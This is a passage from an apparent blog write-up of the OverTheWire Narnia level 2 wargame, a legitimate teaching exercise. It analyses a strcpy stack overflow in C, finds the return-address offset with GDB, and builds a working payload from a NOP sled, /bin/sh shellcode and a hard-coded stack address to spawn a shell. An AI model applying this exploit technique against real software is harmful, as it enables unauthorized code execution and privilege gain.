narnia2<\/code> user the .\/narnia2<\/code> binary and source code, narnia2.c<\/code> are accessible. They can be located at the \/narnia\/<\/code> directory.\nFirst, we will take a peek at the source code. Personally, I like to use the less<\/code> command but, the cat<\/code> command will work just fine. <\/p>\n\nSource Code Analysis<\/h2>\n\n
![\"\"](\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2019\/04\/Narnia1.png?w=1080&ssl=1\")
<\/p>\n\n
Fig. 1: Output for narnia2.c<\/em><\/p>\n\nAnalyzing the source code for narnia2.c<\/code> we see the header files declared.<\/p>\n\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n<\/code><\/pre>\n\nThe #include <stdio.h><\/code> lets us know that the standard input and output header file is included in this source code. Check out the documentation for this header file here<\/a>. <\/p>\n\nThe #include <string.h><\/code> lets us know that the string header file is included in this source code. This library contains several functions for dealing with strings. Check out the documentation for this header file here<\/a>. <\/p>\n\nThe #include <stdlib.h><\/code> lets us know that the standard general utilities library is included in this source code. This library contains several general purpose functions. For more information check out the documentation for this header file here<\/a>.<\/p>\n\nThese declarations are used to tell the compiler which libraries to process first. These are pre-processor statements and ensure the availability of the declarations within these libraries. This is useful for us because it is a precurser into letting us know what this program does. \nThe next line declares the main<\/code> function and passes two arguments, argc<\/code> and argv<\/code>.<\/p>\n\nint main(int argc, char * argv[]){\n<\/code><\/pre>\n\nThe variables named argc<\/code> (argument count<\/em>) and argv<\/code> (argument vector<\/em>). The first argument is the number of parameters passed plus one to include the name of the program that was executed to get those process running. Thus, argc<\/code> is always greater than zero and argv[]<\/code> is the name of the executable (including the path) that was run to begin this process.<\/p>\n\nNext we have an array declared named buf<\/code> with a size of 128<\/code>. This is important to us because we now know the limitations of this variable. <\/p>\n\n char buf[128];\n<\/code><\/pre>\n\nMoving forward we have an if statement<\/code> which tells us if argc == 1<\/code> then the statement Usage: %s argument\\n\", argv[0]<\/code> is printed. From what we learned earlier in the main<\/code> function declaration. The argv<\/code> variable is the actual executable and argc<\/code> is the arugments passed to it. This if-statement<\/code> tells us that we must pass some argument to the executable in order for it to run. <\/p>\n\nif(argc == 1){\n printf(\"Usage: %s argument\\n\", argv[0]);\n exit(1);\n }\n<\/code><\/pre>\n\nNext we get to the actual functionality of the main<\/code> function. First, the strcpy<\/code> function takes the arguments passed via argv<\/code> and copies it to the variable buf<\/code>. The variable buf<\/code> only has room for 128<\/code> bytes. As indictated by the char buf[128];<\/code> declaration. Then the value’s passed are printed out. <\/p>\n\n strcpy(buf,argv[1]);\n printf(\"%s\", buf);\n\n return 0;\n}\n<\/code><\/pre>\n\nBinary Analysis<\/h2>\n\n
Now that we know a little more about how the program is supposed to run lets see what it looks like when run under the right circumstances. One command I like to run is ltrace<\/code> which will run the binary until it exits. Recording and intercepting the dynamic library calls that are called by the executable. This is not necessary however, it will show us some information regarding the memory addresses that are called. Running the executable a few times with ltrace<\/code> will show us if the memory addresses change. Indicating the binary was compiled with ASLR (Address Space Layout Randomization). Running the executable with and without a command line argument. <\/p>\n\nltrace .\/narnia2\nltrace .\/narnia2 $(python -c 'print \"A\"*128')\n<\/code><\/pre>\n\n![\"\"](\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2019\/04\/Narnia2.png?w=1080&ssl=1\")
\nFig. 2: Memory address doesn’t change for the main() function.<\/em><\/p>\n\nNow we know the memory address doesn’t change. We supplied exactly 128 A’s so let’s step it up and add some more characters and observe. Let’s add 140 A’s and see what happens.<\/p>\n\n
ltrace .\/narnia2 $(python -c 'print \"A\"*140')\n<\/code><\/pre>\n\n![\"\"](\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2019\/04\/Narnia4.png?w=1080&ssl=1\")
\nFig. 3: Segmentation Fault when supplying more than 128 characters<\/em><\/p>\n\nGreat! We got a Segmentation Fault<\/code> and now we need to determine the exact offset to craft our payload. We will use GDB<\/code> to debug the binary while supplying the charcters.\nTo run the binary through GDB<\/code> run the below:<\/p>\n\ngdb -q .\/narnia2\n<\/code><\/pre>\n\nThis part is not necessary but I like to set the disassembly flavor to intel.<\/p>\n\n
set disassembly-flavor intel\n<\/code><\/pre>\n\nThen we will disassemble main<\/code> and set a breakpoint at the end of the main()<\/code> function. Your memory address may be different but you’ll want to set a breakpoint at the leave<\/code> operand.<\/p>\n![\"\"](\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2019\/04\/Narnia5.png?w=1080&ssl=1\")
\n\nFig. 4: Disassembly of the main() and breakpoint set<\/em><\/p>\n\nWith our breakpoint set we can now run our payload to determine the offset. Knowing the offset is important to know the size of our exploit and knowing where to set the return address. To do this we will supply 140 “A”s plus 4 “B”s and see if our “B”s overwrite the Instruction Pointer(EIP) register. \n![\"\"](\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2019\/04\/Narnia6.png?w=1080&ssl=1\")
<\/p>\n\n
Fig. 5: The A’s continue to overwrite the EIP register<\/em><\/p>\n\nOk, so our EIP register was not overwritten by our B’s so it looks like we need to reduce our A’s. We will reduce our A’s by 4 and try again. So we will send 136 A’s and 4 B’s and if that doesn’t work we will continue to reduce our A’s until we see our EIP register overwritten by our B’s.<\/p>\n\n
![\"\"](\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2019\/04\/Narnia7.png?w=1080&ssl=1\")
<\/p>\n\n
Fig. 6: The EIP register is overwritten with a payload of 132 A’s.<\/em><\/p>\n\nExploit Development<\/h2>\n\n
We have our offset and know the size we are working with. Let’s start crafting our exploit! Consulting http:\/\/shell-storm.org<\/a> we will be using this Linux x86 execve(“\/bin\/sh”)<\/a> shellcode. <\/p>\n\nchar shellcode[] = \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\"\n \"\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\"\n \"\\xe3\\x89\\xc1\\x89\\xc2\\xb0\\x0b\"\n \"\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80\";\n<\/code><\/pre>\n\nThis shellcode will execute \/bin\/sh<\/code> for us and is 25 bytes in size. Taking our payload of 136 A’s and replace them with a NOP sled (\\x90<\/code>), minus 25 bytes for our shellcode and 4 bytes for our EIP. The NOP<\/code> sled is used to direct the CPU’s instruction execution flow to a desired destination. In this case, our shellcode.<\/p>\n\n$(python -c 'print \"\\x90\"*107 + \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x89\\xc2\\xb0\\x0b\\xcd\\x80\" + \"B\"*4')\n<\/code><\/pre>\n\nLet’s throw our payload at the binary and see what happens. \n![\"\"](\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2019\/04\/Narnia8.png?w=1080&ssl=1\")
\nFig. 7: The binary with our payload and EIP register overwritten with B’s<\/em>\nNow, we need replace our B’s with the memory address somewhere in the middle of our NOP<\/code> sled. To do this we will examine the Stack Pointer (ESP) and find a memory address that is filled with \\x90<\/code>. To examine the stack.<\/p>\n\nx\/300wx $esp\n<\/code><\/pre>\n\n<\/p>\n\n
![\"\"](\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2019\/04\/Narnia9.png?w=1080&ssl=1\")
<\/p>\n\n
Fig. 8: The stack with our NOP sled, payload and the EIP buffer<\/em><\/p>\n\nPicking a memory address somewhere in the middle, like 0xffffd850<\/code> should work. Essentially what will happen is the EIP<\/code> register will be overwritten with our NOP<\/code> sled and slide into our shellcode, perpetually. Our new payload looks like this now.<\/p>\n\n$(python -c 'print \"\\x90\"*107 + \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x89\\xc2\\xb0\\x0b\\xcd\\x80\" + \"\\x50\\xd8\\xff\\xff\"')\n<\/code><\/pre>\n\n![\"\"](\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2019\/04\/Narnia10.png?w=1080&ssl=1\")
\nFig. 9: The debugger executes a new process when EIP is overwritten with the NOP sled<\/em>\nGreat! We can see in the debugger that our payload executes a new program \/bin\/dash<\/code>. This lets us know that our payload is ready. Now it’s time to test it against the binary.\n![\"\"](\"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2019\/04\/Narnia11.png?w=1080&ssl=1\")
\nFig. 10: Successful exploitation of the narnia2 binary<\/em><\/p>\n\n\n\n If you missed out on Narnia Level 1 click the button on the left to check it out. If you’re all caught up and want to see more, check out the Narnia Level 3 by clicking the button on the right.<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n